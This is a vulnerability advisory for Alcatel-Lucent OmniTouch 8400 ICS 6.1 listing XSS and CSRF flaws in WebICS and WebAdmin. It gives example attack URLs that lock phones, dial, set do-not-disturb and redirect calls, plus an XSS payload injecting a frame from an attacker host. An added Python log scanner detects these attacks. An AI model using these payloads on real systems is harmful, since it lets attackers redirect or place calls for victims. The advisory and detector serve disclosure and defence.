Affected products:
Alcatel-Lucent OmniTouch 8400 Instant Communications Suite (ICS) Version 6.1 Patch 102a
(Older releases have not been tested)
Summary:
Alcatel-Lucent's ICS offers Unified Communication services over several access paths, such as handhelds and web clients. The web client WebICS offers end users services such as access to personal and global address books, initiating calls, call redirects, etc.
Several common flaws could be found in WebICS, namely reflected and stored XSS as well as CSRF. In WebAdmin, reflected XSS could be found.
Possible Effects:
One could use a stored XSS in the phonebook to change end users' phone configuration, such as DND or call redirect.
Vulnerable Scripts WebICS:
CSRF:
- /Websoftphone/servlet/DispPhoneSet
- /Websoftphone/servlet/DispRTC
Stored XSS:
- All input fields of the phonebook
Reflected XSS:
- /Websoftphone/jsp/CBCallBackCont.jsp, parameter list
- /Websoftphone/jsp/PhoneBookCont.jsp, parameter udatab
- /Websoftphone/jsp/CustoData.jsp, parameter openwin
- /Websoftphone/jsp/RTCNavigator.jsp, parameter sessionid
- /Websoftphone/servlet/DispLogon, parameter next
- /Websoftphone/servlet/DispLogon, parameter main
Vulnerable Scripts WebAdmin:
Reflected XSS:
- /ClientMgmt, parameter action
CSRF example:
- Lock a phone
https://www.2cto.com/websoftphone/servlet/DispPhoneSet?method=setLock
- Dial
https://www.2cto.com/websoftphone/servlet/DispRTC?method=makeCall&number=XXXX
- Set DND
https://www.2cto.com/websoftphone/servlet/DispPhoneSet?method=setDoNotDisturb
- Set call forward
https://www.2cto.com/websoftphone/servlet/DispPhoneSet?method=setForward&type=immediate&FwdTarget=onSomeone&number=xxxx
Reflected XSS example (CBCallBackCont.jsp, parameter list):
https://www.2cto.com/websoftphone/jsp/CBCallBackCont.jsp?list=%22%3E%3CFRAME%20SRC=%22http://www.boeserangreifer.de%22%3E%3C&rand=0
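Until the vendor patch is applied, the two issue classes above can be watched for in the web front end's access log. The following is an added detection example, not code from the advisory or from Alcatel-Lucent: it parses NCSA combined-format log lines (constructed sample lines, with `attacker.invalid` and `ics.example.internal` as placeholder hosts) and flags (1) markup in the parameters listed as reflected-XSS sinks and (2) state-changing GET requests to DispPhoneSet/DispRTC that were not initiated from the ICS's own pages, separating the "foreign Referer" case from the "no Referer at all" case, which browsers and proxies produce legitimately and which therefore deserves a lower-confidence finding.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts and parameters named in the advisory above (paths lower-cased for matching).
REFLECTED_XSS_PARAMS = {
    "/websoftphone/jsp/cbcallbackcont.jsp": {"list"},
    "/websoftphone/jsp/phonebookcont.jsp": {"udatab"},
    "/websoftphone/jsp/custodata.jsp": {"openwin"},
    "/websoftphone/jsp/rtcnavigator.jsp": {"sessionid"},
    "/websoftphone/servlet/displogon": {"next", "main"},
    "/clientmgmt": {"action"},
}
# Servlets whose state-changing actions the advisory shows as plain GET requests (CSRF).
CSRF_SERVLETS = {"/websoftphone/servlet/dispphoneset", "/websoftphone/servlet/disprtc"}

# Crude indicator of HTML/script injection in a decoded parameter value.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)

# NCSA combined log: ip ident user [ts] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

OWN_HOST = "ics.example.internal"  # hypothetical hostname of the ICS web front end


def analyse_line(line, own_host=OWN_HOST):
    """Return a list of findings for one access-log line (empty if nothing suspicious)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    findings = []
    url = urlsplit(m["target"])
    path = url.path.lower()
    params = parse_qs(url.query, keep_blank_values=True)
    base = {"ip": m["ip"], "ts": m["ts"], "path": url.path}

    # 1. Reflected XSS: markup in a parameter the advisory lists as unescaped.
    for name in REFLECTED_XSS_PARAMS.get(path, ()):
        for value in params.get(name, []):
            decoded = unquote(value)  # parse_qs decoded once; catch double encoding too
            if MARKUP_RE.search(decoded):
                findings.append({**base, "kind": "reflected_xss_attempt",
                                 "param": name, "value": decoded})

    # 2. CSRF: state-changing GET to DispPhoneSet/DispRTC not initiated from our own pages.
    if path in CSRF_SERVLETS and m["method"] == "GET":
        action = params.get("method", ["?"])[0]
        ref_host = urlsplit(m["referer"]).hostname if m["referer"] not in ("", "-") else None
        if ref_host is None:
            # Missing Referer is common (privacy settings, proxies): low-confidence finding.
            findings.append({**base, "kind": "state_change_without_referer", "action": action})
        elif ref_host.lower() != own_host:
            findings.append({**base, "kind": "cross_site_state_change",
                             "action": action, "referer_host": ref_host})
    return findings


def scan_log(text, own_host=OWN_HOST):
    """Scan a whole log text; findings are returned in log order."""
    out = []
    for line in text.splitlines():
        if line.strip():
            out.extend(analyse_line(line, own_host))
    return out


# Constructed sample log (not real traffic): one XSS probe, one cross-site forward change,
# one legitimate lock from the ICS's own UI, one harmless phonebook view, one call with no Referer.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2012:10:01:13 +0100] "GET /websoftphone/jsp/CBCallBackCont.jsp?list=%22%3E%3CFRAME%20SRC=%22http://attacker.invalid%22%3E%3C&rand=0 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2012:10:02:40 +0100] "GET /websoftphone/servlet/DispPhoneSet?method=setForward&type=immediate&FwdTarget=onSomeone&number=5551234 HTTP/1.1" 302 0 "http://intranet-news.invalid/page.html" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2012:10:03:02 +0100] "GET /websoftphone/servlet/DispPhoneSet?method=setLock HTTP/1.1" 302 0 "https://ics.example.internal/websoftphone/jsp/RTCNavigator.jsp" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2012:10:03:30 +0100] "GET /websoftphone/jsp/PhoneBookCont.jsp?udatab=global HTTP/1.1" 200 8812 "https://ics.example.internal/websoftphone/jsp/RTCNavigator.jsp" "Mozilla/5.0"
10.0.0.11 - - [12/Mar/2012:10:04:15 +0100] "GET /websoftphone/servlet/DispRTC?method=makeCall&number=5559999 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["kind"], f.get("param") or f.get("action"), f.get("referer_host", ""))
```

Run against the sample, the scanner reports three findings: the FRAME injection in `list`, the forward change referred from a foreign host, and the Referer-less makeCall; the lock issued from the ICS's own RTCNavigator page and the plain phonebook view are left alone. The Referer check is a triage aid only, since a missing header is not proof of an attack and an attacker's page may suppress it; the real fix remains the vendor patch and a per-session CSRF token on every state-changing request.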
Solution:
Install official patches.